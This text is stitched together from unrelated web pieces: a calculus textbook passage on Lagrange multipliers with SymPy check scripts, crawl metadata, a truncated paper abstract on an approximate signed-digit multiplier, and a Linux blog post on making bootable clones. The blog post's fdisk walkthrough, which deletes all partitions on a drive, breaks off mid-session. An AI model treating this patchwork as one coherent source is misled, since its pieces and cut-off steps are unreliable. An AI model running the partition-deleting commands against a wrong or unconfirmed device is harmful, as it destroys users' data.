type of partition 'Linux' to 'Linux swap'. Command (m for help): w The partition table has been altered. Calling ioctl() to re-read partition table. Syncing disks. • Format the UEFI partition. You might need to install dosfstools (eg. apt install dosfstools) to create the FAT partition. mkfs.fat -F32 /dev/sdx1 • Create the file system. Remember to edit /dev/sdx2 appropriately. mkfs.ext4 /dev/sdx2 • Set up the swap partition. mkswap /dev/sdx3 • Mount the file system. Remember to edit /dev/sdx2 first. mount -t ext4 /dev/sdx2 /mnt • Create some special directories. mkdir /mnt/dev mkdir /mnt/dev/pts mkdir /mnt/sys mkdir /mnt/proc ### Mount and Copy • Mount the clone you’re updating. Skip this command if you’re starting from scratch, as you’ve already mounted the new drive. mount -t ext4 /dev/sdx2 /mnt • Because we’re using rsync, if a clone already exists on this drive, it will incrementally update which should save some time. rsync --archive --verbose --delete --exclude=/dev --exclude=/sys --exclude=/proc --exclude=/mnt -xx / /mnt ### Install GRUB2 • Now you have the files copied, but you have to install a bootloader to make the drive bootable. To do this, we’ll chroot to the clone disk after making some special system directories available there. 
mount --bind /dev /mnt/dev
mount --bind /dev/pts /mnt/dev/pts
mount --bind /sys /mnt/sys
mount --bind /proc /mnt/proc
mkdir /mnt/boot/efi
mount /dev/sdx1 /mnt/boot/efi
chroot /mnt
• Install the bootloader. Remember that you have to fix up /dev/sdx in two places before executing these commands.
grub-install /dev/sdx
grub-install --recheck /dev/sdx
update-grub
### Clean up /etc/fstab
• This is a trickier part of the process. Systems are likely to be configured to use other disk partitions for /boot or /home or for swap space. In order to keep things clean and simple, I've made the clone into a monolithic file system. Unfortunately, the cloned /etc/fstab might cause the system to fail to boot. These commands attempt to create an fstab that's good enough to boot. (Swap might be important to you; see the note at the end of this article for information on re-enabling swap on a clone.)
• First, back up the existing fstab.
mv /etc/fstab /etc/fstab.bak
• In this command, look out for the buried /dev/sdx2 that needs to be edited!
echo -e "UUID=$(lsblk -no UUID /dev/sdx2)\t/\text4\tdefaults,noatime\t0\t1" >/etc/fstab
### Clean Up and Reboot
• Your clone is complete, but let's clean up a bit.
exit
umount /mnt/boot/efi /mnt/dev/pts /mnt/dev /mnt/sys /mnt/proc /mnt
• When you want to test your clone (and you do!), you'll have to abandon the comfort, safety, and copy/paste convenience of your remote shell and work from the console, as you have to modify boot parameters.
• During the boot process, press del or esc or F11 or F12 or whatever key allows you to change the BIOS or EFI boot device, and change it to the newly created disk.
# Expert Mode
• Here's the whole cloning recipe without the commentary. Remember that it won't work (and can be dangerous!) without editing, but hardcore folks can put this in a window next to their terminal for copypaste profit.
sudo -s
fdisk -l
fdisk /dev/sdx ### fixup
mkfs.fat -F32 /dev/sdx1 ### fixup
mkfs.ext4 /dev/sdx2 ### fixup
mkswap /dev/sdx3 ### fixup
mount -t ext4 /dev/sdx2 /mnt ### fixup
mkdir /mnt/dev
mkdir /mnt/dev/pts
mkdir /mnt/sys
mkdir /mnt/proc
rsync --archive --verbose --delete --exclude=/dev --exclude=/sys --exclude=/proc --exclude=/mnt -xx / /mnt
mount --bind /dev /mnt/dev
mount --bind /dev/pts /mnt/dev/pts
mount --bind /sys /mnt/sys
mount --bind /proc /mnt/proc
chroot /mnt
mkdir /boot/efi
mount /dev/sdx1 /boot/efi/ ### fixup
grub-install /dev/sdx ### fixup
grub-install --recheck /dev/sdx ### fixup
update-grub
mv /etc/fstab /etc/fstab.bak
echo -e "UUID=$(lsblk -no UUID /dev/sdx2)\t/\text4\tdefaults,noatime\t0\t1" >/etc/fstab ### fixup required
exit
umount /mnt/boot/efi /mnt/dev/pts /mnt/dev /mnt/sys /mnt/proc /mnt
# After Words
Remember that the "disaster" in "disaster recovery" can mean many things, from acts of nature to government seizures to theft or sabotage or facility breakdown. I keep two bootable clones of each machine and, each week, I swap them between two geographically-separate sites. That way, I always have a bootable clone that's less than two weeks old even if one location is completely lost. Of course, that's in addition to much-more-frequent rsync backups between sites and archiving cloud backups. Back up in depth; it's good for your health. No, I don't actually juggle 200+ clones. Many of my boxen are very small (think whiteboxed routers). I use a small stack of 2TB portable USB3 drives and create rsync images in separate directories under root.
If I need a clone, I can either copy the subdirectory to root on a fresh drive, or just move the subdirectory up to root. I then install GRUB2 and go. Unlike the Apple use case above, using clones to run from different hardware isn’t quite as straightforward. Since the hardware doesn’t come from a corporate monoculture, more differences exist than in the Macintosh ecosystem. Surprisingly, this hasn’t been as big an issue as I expected, in spite of the fact that my infrastructure is built from fire-sale, castoff, and various other forms of junk computers ranging from Mac minis to repurposed doorstops. It is sometimes necessary to tweak /etc/fstab or to change networking parameters to switch from eth0 to eth1 or the like. In order to keep things as simple as possible, I have not enabled swap (though we did reserve a swap partition). Linux systems tend to degrade more gracefully when swap is enabled. The ArchWiki has a good discussion on how to enable swap.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2128966748714447, "perplexity": 7559.020499160702}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027314721.74/warc/CC-MAIN-20190819093231-20190819115231-00498.warc.gz"}
https://larsson-research.de/publication/larsson-ttns-2019/
# Computing vibrational eigenstates with tree tensor network states (TTNS) [Editor's Pick]

### Abstract

During my postdoctoral studies in the group of Prof. G. Chan (Caltech), as a side project, I worked on the computation of vibrational spectra using tree-tensor network states (TTNS). There, I applied methods developed in the condensed matter community to molecular systems. Compared to established approaches for computing vibrational spectra, such as the multilayer multiconfiguration time-dependent Hartree (ML-MCTDH) method, the new approach is faster and much more robust, and the diagrammatic language from condensed matter physics that I use provides much more insight. I am currently working on using the TTNS method to compute high-lying vibrational states of the Zundel ion.

Type: Publication
Journal: The Journal of Chemical Physics
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8147500157356262, "perplexity": 2239.009793090402}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178366477.52/warc/CC-MAIN-20210303073439-20210303103439-00497.warc.gz"}
https://dergipark.org.tr/tojde/issue/43090/522368
## Comparing Service Quality in Public vs Private Distance Education Institutions: Evidence Based on Malaysia

#### Fazelina Sahul HAMID [1], Nick YIP [2]

Assessment of the quality of distance education institutions has become an important issue that needs to be addressed to ensure program survival. This study uses the SERVPERF model to identify the differences that exist in students' perception of service quality in public and private universities in Malaysia that offer distance education. Our study confirms that this model is valid and reliable. We find that the students' overall perception of service quality is lower in all five dimensions of service quality for the private universities. The dimensions that influence overall service quality are noticeably different for public and private universities. This suggests that private universities need to improve their service provision in order to remain competitive. Managerial implications of the major findings are discussed.

Keywords: service quality, SERVPERF model, distance education, higher learning institutions
Primary Language: English
Authors: Fazelina Sahul HAMID (Primary Author, ORCID: 0000-0002-9140-9789), Nick YIP (ORCID: 0000-0003-4550-8994)
Publication Date: January 1, 2019
Hamid, F. S., & Yip, N. (2019). Comparing Service Quality in Public vs Private Distance Education Institutions: Evidence Based on Malaysia. Turkish Online Journal of Distance Education, 20(1), 17-34. https://doi.org/10.17718/tojde.522368
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.24179477989673615, "perplexity": 15564.55636260494}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027321696.96/warc/CC-MAIN-20190824194521-20190824220521-00466.warc.gz"}
https://ecommons.cornell.edu/handle/1813/323/browse?type=author&value=Jennifer%2C+Burlingame
Now showing items 1-1 of 1 • #### The ABC's: Atherosclerosis, Blood Flow, and the Carotid Artery  (1999-01-10) The effects of blood flow were analyzed in the carotid artery, using computer aided engineering software (FIDAP and GAMBIT). The study was conducted because patients that have atherosclerosis often have plaque build up ...
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8633103370666504, "perplexity": 12743.866358752359}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656104585887.84/warc/CC-MAIN-20220705144321-20220705174321-00536.warc.gz"}
http://physics.stackexchange.com/questions/18557/visible-light-spectrum-to-color-space
Visible light spectrum to color space I need to be able to convert an arbitrary emission spectrum in the visible spectrum range (i.e. for every wavelength between 380 and 780, I have a number between 0 and 1 that represents the "intensity" or dominance of that wavelength), and I need to be able to map any given spectrum into a particular color space (for now I need RGB or CIE-XYZ). Is it possible? For the spectrum say I have the emission spectrum of a white light, then every wavelength in the spectrum will have an intensity of 1, whereas for a green-bluish light I'd have most of the wavelengths between 500 and 550 with an intensity close to 1, with other wavelengths gradually dropping in intensity. So the first spectrum should be converted to pure white whereas the other one would be converted to a green-bluish color in any color space. Is there a way to do this? - – Colin K Dec 21 '11 at 0:31 Also, this is a classic optics homework question. – Colin K Dec 21 '11 at 0:31 This isn't homework and I'm not an optic physics student, I just happened to need to solve this problem and needed some guidance because I didn't understand what I found online via google. Thanks for the link to the question though. – Thomas Dec 21 '11 at 0:53 White light is not a flat spectrum, it's whatever our eyes perceive as white. White is typically modeled by “standard illuminants”, such as D65 or D50, which mimic average daylight or sunlight spectra. – Edgar Bonet Dec 21 '11 at 9:04 1 Answer Human eye has three types of color receptors which respond differently to different parts of the spectrum. See this chart. One way to tackle your challenge is to basically simulate what the eye does: you take the spectrum as input, calculate how much it would excite each of the three color receptors based on their sensitivity to different parts of the spectrum and then use the three resulting numbers as RGB corresponding to the spectrum. In order to compute the excitation level, you can integrate the product of the sensitivity SC(λ) of each of the three color receptors with your spectral power distribution P(λ) to obtain the three RGB numbers: $$R = \int_{0}^{+\infty} S_R(\lambda) P(\lambda) d\lambda$$ $$G = \int_{0}^{+\infty} S_G(\lambda) P(\lambda) d\lambda$$ $$B = \int_{0}^{+\infty} S_B(\lambda) P(\lambda) d\lambda$$ For prototyping you can probably just assume the sensitivity SC(λ) functions to be appropriately scaled and translated Gaussian functions of the wavelength. As you refine your model you should seek better sensitivity functions for each of the three types of color receptors. - +1 my thoughts exactly :-) It would be great to find numerical data about the sensitivity functions somewhere. – David Z Dec 21 '11 at 0:23 There are standard sensitivity functions produced from decades of experimentation. They are maintained by the International Commission on Illumination (CIE). You can find all of that data on the CIE website. – Colin K Dec 21 '11 at 0:43 Thanks! I used the chart and quickly worked out the mean and sd's for the normal distributions of each color component and obtained this result with (RMean = 570, RSD = 70, GMean = 530, GSD = 50, BMean = 440 and BSD = 40): link. It's still missing the purple band on the left and a few other colors but that's because my approximation is pretty bad, I'll be looking at the CIE site to find the sensitivity functions. Thanks! – Thomas Dec 21 '11 at 0:55
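The recipe in the accepted answer is easy to prototype. The sketch below follows it literally, but with placeholder sensitivity curves: Gaussians using the rough means and standard deviations quoted in the final comment (570/70, 530/50, 440/40 nm) rather than the real CIE color-matching data, so the output is only a crude approximation.

```python
import numpy as np

# 1 nm wavelength grid over the visible range.
wl = np.arange(380.0, 781.0, 1.0)

def gaussian(x, mean, sd):
    return np.exp(-0.5 * ((x - mean) / sd) ** 2)

# Rough Gaussian stand-ins for the three receptor sensitivities, using the
# means/standard deviations mentioned in the comments (not official CIE data).
S_R = gaussian(wl, 570.0, 70.0)
S_G = gaussian(wl, 530.0, 50.0)
S_B = gaussian(wl, 440.0, 40.0)

def spectrum_to_rgb(P):
    """Integrate the spectral power distribution P (sampled on `wl`, values
    in [0, 1]) against each sensitivity curve; normalize so that a flat
    spectrum maps to pure white (1, 1, 1)."""
    rgb = np.array([np.sum(S * P) for S in (S_R, S_G, S_B)])
    white = np.array([np.sum(S) for S in (S_R, S_G, S_B)])
    return np.clip(rgb / white, 0.0, 1.0)

print(spectrum_to_rgb(np.ones_like(wl)))           # flat spectrum -> [1. 1. 1.]
print(spectrum_to_rgb(gaussian(wl, 525.0, 25.0)))  # green-bluish peak near 525 nm
```

Swapping the Gaussians for the tabulated CIE 1931 color-matching functions, and then converting the resulting XYZ values to sRGB, would give the proper mapping the comments point to.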
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 3, "x-ck12": 0, "texerror": 0, "math_score": 0.6371665596961975, "perplexity": 530.2288115737646}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-07/segments/1454701160950.71/warc/CC-MAIN-20160205193920-00291-ip-10-236-182-209.ec2.internal.warc.gz"}
https://mumamme.wordpress.com/page/2/
## Over the Wall

Probably the only thing that is more difficult to do in mainland China than to log onto Facebook is to log onto WordPress. I have to climb over the wall. As Pink Floyd would ask, "Am I just another brick in the wall?"

## The City of Two Tales

Hong Kong is the city of two tales. Around the universities where I have studied, it was quiet, young and innocent. The sea is harbored by the small bay, like we are by the libraries. In the neighborhoods at Sheung Wan where I live, life unfolds every corner of its diversity. The smell of the sea becomes the smell of the fish. This is the life that local people are living. Before I could realize it, I found myself already chatting with the old doorman in my broken Cantonese.

## The Surgeon

This may freak people out, but I crazily think that a good scientist should be as good as a good surgeon: he should be the combination of extraordinary familiarity with the subject and extraordinary intuition in his field. His expertise should be accumulated through millions of surgeries, through the weirdest and toughest cases that he tried hard to fix. His wisdom should give him excellent intuitions in cases where nobody has complete knowledge before a treatment has been performed. Once he grows old, a good surgeon should still be able to perform a basic surgery completely with his own hands. Once he grows old, a good scientist should still be able to derive an equation confidently on the blackboard. No patient wants to put his/her life in the hands of the second-best surgeon. No good question wants to put its answer in the hands of a second-best scientist. There is no shame in not being the best, though. But the bottom line is that, if you do it, you should keep going for the best. I know this is crazy thinking, and may earn me a risky and bumpy path. But after all, life has so many other places to keep peace for me.

## Grothendieck

Maths people were surprised when I laughed at some Chinese translation of Grothendieck, because they did not think I would have heard of him. The fact is that I definitely have NO knowledge about algebraic geometry. But I got to hear some stories and myths (among which the fact that his nationality is "none" is the most hilarious) about him through reading the book The Mathematician's Brain. It is an intriguing and heart-soothing book! Many of my friends have read it, and I recommend it to the rest of them who have not read it.

## Where you want, where it wants

The moment I woke up this morning, I noticed that the curve of my hair did not match my expectation. That reminded me of what my hair-dresser said about hair when she trimmed my hair last month: "Don't worry. Sometimes it goes where you want, and sometimes it goes where it wants."

## Before and After

I just came back from today's concert by the Chicago Symphony Orchestra. It was fabulous. I am really into symphonies (a switch from concertos) recently, and Brahms No. 2 was just beyond words. The following stream of thoughts came to me BEFORE the performance: Art and science incredibly mirror each other, in that both involve a process of creating and defining a set of criteria. The criteria are for those who practice it, as well as for those who wish to admire them. Without knowing the standard, one may be able to tell the worst art or science from others, but cannot tell which one of the avant-garde is truly valuable. The standard is subtle, but not trivial. The value of art and science is known only to those who have learned them well enough.
Moreover, both art and science contain elements that are drastically different from "problem-solving" for engineers. They explore and experiment with the underlying structures of the problem, but not merely for the purpose of solving it. This is good and bad. On the bright side, they raise questions and reveal insights that are naturally ignored by the engineer. On the dark side, because the answer to "what is important" for art and science is soft and not known to anyone on earth, it is subject to those in possession of power. Unlike what Plato envisioned in "The Republic", those with power are not necessarily those who deserve it. In fact, they are usually those who have the strongest desire and lust for power. Thus, this opens up space for the human lust for power to exercise and even rule. A danger, in a sense.

The following stream of thoughts came to me AFTER the performance: Who cares? The sensational music rules!

## Coldplay?

Does anyone else find the new Coldplay album, Mylo Xyloto, unsatisfactory? Because I do. I have to go back to some of their impressive old songs that I enjoyed, such as The Scientist, to reconstruct my fondness for this band. Well, "Nobody said it was easy."

## The Voiceless Song

Once in a while I wish I were not as sensitive as I actually am. If things are going to happen anyway, let them happen. If there is nothing I can do to change something, I shall go on by myself. Just don't take any detours. Keep working. In any case, live for the present and the future.

## The Prospective Book Shopper

Having pre-ordered three books on Amazon, I suspect that I have turned from a retrospective book shopper into a prospective one. Pre-ordering means that I pay online for a book (at a price claimed to be a guaranteed discount) before it is published. Ideally (which has never happened), the book would be delivered to me as soon as it is published. The first book I pre-ordered last year was Daniel Kahneman's Thinking, Fast and Slow. I finished it. It was an impressive read! I recommend it to everybody. This year, I have ordered two books: 1. Why Nations Fail, by Acemoglu and Robinson. 2. The Social Conquest of Earth, by Wilson. The former will come out March 20, and the latter April 9. If I go broke someday, it will be due to my prospective book-shopping, because I am spending in advance against future income flows.

## Democratizing Knowledge and Garbage

Democratizing knowledge is to valuable ideas what $\LaTeX$ is to good writing. The relation implicit in both of the above two pairs is: there is no correlation. If we are thinking garbage, democratizing knowledge merely mobilizes our garbage. If we are writing garbage, $\LaTeX$ merely visualizes our garbage.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 2, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.22438952326774597, "perplexity": 1977.4608669010927}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-43/segments/1508187826283.88/warc/CC-MAIN-20171023183146-20171023203146-00601.warc.gz"}
https://www.hotukdeals.com/deals/xbox-one-with-kinect-holiday-value-bundle-tesco-direct-for-179-2542266
391° Expired

# Xbox One with Kinect Holiday Value Bundle @ Tesco Direct for £179

Found 8th Nov 2016. Never seen this bundle so cheap. Good price if you're wanting the extras.

Comments:

shapalando: The Elite console is the same price. I know what I'd rather have.

gopolog86: Where's the Elite console for £180 new?

Reply: hotukdeals.com/dea…251

Reply: tesco.com/dir…868 The link goes to Tesco Groceries, but if you go to the Tesco Direct website it's definitely there. Really good price, HOT!

gopolog86: Yep, just seen it, thanks guys.

Another commenter: Thank you, ordered one even though I already have one. Type "Tesco Direct" and it's there.

Original Poster (replying to shapalando): Wow, you're right! I've ordered one just for the controller. Crazy price!

kishengajjar: Holy bejesus, this is cheap. Don't wait for Black Friday. Just bought the Elite, crazy money.
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9265614151954651, "perplexity": 11763.029528813999}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794865651.2/warc/CC-MAIN-20180523121803-20180523141803-00064.warc.gz"}
https://www.physicsforums.com/threads/max-efficiency-thermodynamics.385712/
# Max efficiency (thermodynamics)

1. Mar 11, 2010
### pinsky

I'm observing the cyclic process of a heat engine. Its p-V diagram is shown in the attached image. Between points 3 and 4 the heat is extracted. That causes losses, since the efficiency is given by
$$\eta = 1 - \frac{Q_c}{Q_h}$$
where $Q_h$ is the heat the heat source has given and $Q_c$ the amount of heat that the "cold" container took. If we don't cool down the engine during the process between 3 and 4, the efficiency would grow to 100% (if friction is not considered). The process would then look like the picture below, and between 3 and 1 we would do an isobaric contraction. I've encountered isobaric processes through my studies, but only as a theoretical concept. What are the reasons why it couldn't be used here?

Attached file: why_not_thermodynamics.gif (2.8 KB)

2. Mar 11, 2010
### QuantumPion

How can you compress the working fluid without changing its pressure or temperature?

3. Mar 11, 2010
### pinsky

I don't know; how do you get an isobaric process ever? :)
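As an aside for anyone who wants to plug numbers into the efficiency formula quoted above, here is a tiny Python sketch (added for illustration, not part of the original thread); the heat values in the example are made up:

```python
def thermal_efficiency(q_hot, q_cold):
    # eta = 1 - Qc / Qh for a heat engine running in a cycle.
    if q_hot <= 0:
        raise ValueError("Qh must be positive")
    return 1.0 - q_cold / q_hot

# Hypothetical values: 1000 J taken from the hot reservoir, 600 J rejected to the cold one.
print(thermal_efficiency(1000.0, 600.0))  # 0.4, i.e. 40% efficient
```

Setting q_cold to zero reproduces the 100% figure discussed in the thread, which is exactly what the second law (Kelvin-Planck statement) forbids for a cyclic process.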
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7613387703895569, "perplexity": 2025.975458645507}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-39/segments/1537267155924.5/warc/CC-MAIN-20180919043926-20180919063926-00011.warc.gz"}
https://cn.overleaf.com/articles/series-representation-of-power-function/mrrthfyxxttw
Author: Kolosov Petro
Last updated: 4 years ago

Abstract: In this paper, we derive and prove, by means of the Binomial theorem and Faulhaber's formula, the following identity between $m$-order polynomials in $T$:
$$\sum_{k=1}^{\ell}\sum_{j=0}^m A_{m,j}k^j(T-k)^j=\sum_{k=0}^{m}(-1)^{m-k}U_m(\ell,k)\cdot T^k=T^{2m+1}, \ \ell=T\in\mathbb{N}.$$
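To give a feel for the kind of identity involved (this is not taken from the paper itself), the simplest case $m=1$ reduces, with the assumed coefficient values $A_{1,0}=1$ and $A_{1,1}=6$ (the abstract does not state them), to the classical fact that $T^3=\sum_{k=1}^{T}\left(1+6k(T-k)\right)$. A quick numerical check in Python:

```python
# Check T^3 == sum_{k=1..T} (1 + 6*k*(T-k)) for small T.
# The coefficients 1 and 6 are assumed values of A_{1,0} and A_{1,1};
# they are not given in the abstract above.
for T in range(1, 50):
    assert sum(1 + 6 * k * (T - k) for k in range(1, T + 1)) == T ** 3
print("identity holds for T = 1..49")
```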
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 1, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 28, "x-ck12": 0, "texerror": 0, "math_score": 0.785632312297821, "perplexity": 2388.7612104543823}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656104585887.84/warc/CC-MAIN-20220705144321-20220705174321-00385.warc.gz"}
http://www.combinatorics.org/ojs/index.php/eljc/issue/view/Volume19-4
## Volume 19, Issue 4 (2012)

#### Papers

- P1. The Lowest-Degree Polynomial with Nonnegative Coefficients Divisible by the $n$-th Cyclotomic Polynomial (John P. Steinberger)
- P2. Constructions of Bipartite and Bipartite-regular Hypermaps (Rui Duarte)
- P3. Invariant Principal Order Ideals under Foata's Transformation (Teresa X.S. Li, Melissa Y.F. Miao)
- P4. Some Constant Weight Codes from Primitive Permutation Groups (Derek H. Smith, Roberto Montemanni)
- P5. Rainbow Connection of Sparse Random Graphs (Alan Frieze, Charalampos E. Tsourakakis)
- P6. Uniquely $K_r$-Saturated Graphs (Stephen G. Hartke, Derrick Stolee)
- P7. On Extensions of the Alon-Tarsi Latin Square Conjecture (Daniel Kotlar)
- P8. Orientations, Semiorders, Arrangements, and Parking Functions (Sam Hopkins, David Perkinson)
- P9. The Closed Knight Tour Problem in Higher Dimensions (Joshua Erde, Bruno Golénia, Sylvain Golénia)
- P10. Maximum Frustration in Bipartite Signed Graphs (Garry S Bowlin)
- P11. Repetition Threshold for Circular Words (Irina A. Gorbunova)
- P12. Hypohamiltonian Graphs and their Crossing Number (Carol T. Zamfirescu)
- P13. Spectral Properties of Unitary Cayley Graphs of Finite Commutative Rings (Xiaogang Liu, Sanming Zhou)
- P14. Locally Restricted Compositions IV. Nearly Free Large Parts and Gap-Freeness (Edward A. Bender, E. Rodney Canfield, Zhicheng Gao)
- P15. New Proofs of Determinant Evaluations Related to Plane Partitions (Hjalmar Rosengren)
- P16. Ehrhart $f^*$-Coefficients of Polytopal Complexes are Non-negative Integers (Felix Breuer)
- P17. Finite Homomorphism-Homogeneous Permutations via Edge Colourings of Chains (Igor Dolinka, Éva Jungábel)
- P18. Large 2-Coloured Matchings in 3-Coloured Complete Hypergraphs (Tamás Terpai)
- P19. Canonical Decompositions of Affine Permutations, Affine Codes, and Split $k$-Schur Functions (Tom Denton)
- P20. On Codes that are Invariant under the Affine Group (Peter Sin)
- P21. A Simple Branching Process Approach to the Phase Transition in $G_{n,p}$ (Béla Bollobás, Oliver Riordan)
